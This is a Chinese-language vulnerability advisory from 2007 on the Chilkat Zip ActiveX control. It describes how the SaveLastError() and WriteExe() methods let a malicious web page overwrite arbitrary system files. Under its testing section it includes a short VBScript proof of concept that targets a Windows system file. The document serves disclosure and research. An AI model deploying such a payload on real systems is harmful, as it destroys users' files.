发布日期：2007-07-07
更新日期：2007-07-09

受影响系统：

Chilkat Software Chilkat Zip 12.4.2.0

描述：

---

BUGTRAQ  ID: 24806

Chilkat Zip是一个功能强大的ActiveX控件，允许建立及管理压缩文件。

Chilkat Zip ActiveX控件在处理请求参数时存在漏洞，远程攻击者可能利用此漏洞破坏用户系统上的文件。

Chilkat Zip ActiveX控件（ChilkatZip2.dll）的SaveLastError()和WriteExe()方式没有正确地验证用户输入。如果用户受骗访问了恶意站点并向上述方式传送了恶意参数的话，就可能导致覆盖任意系统文件。

<*来源：shinnai （shinnai@autistici.org）
  
  链接：http://secunia.com/advisories/25962/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<script language='vbscript'>
    test.SaveLastError "c:\windows\system_.ini"
    MyMsg = MsgBox ("Check now the file system.ini" & vbCrLf & "It's overwritten.", 64,"Chilkat Zip")
</script>
</span>
</code></pre>

建议：

---

厂商补丁：

Chilkat Software
----------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.chilkatsoft.com/

浏览次数：2619
严重程度：0（网友投票）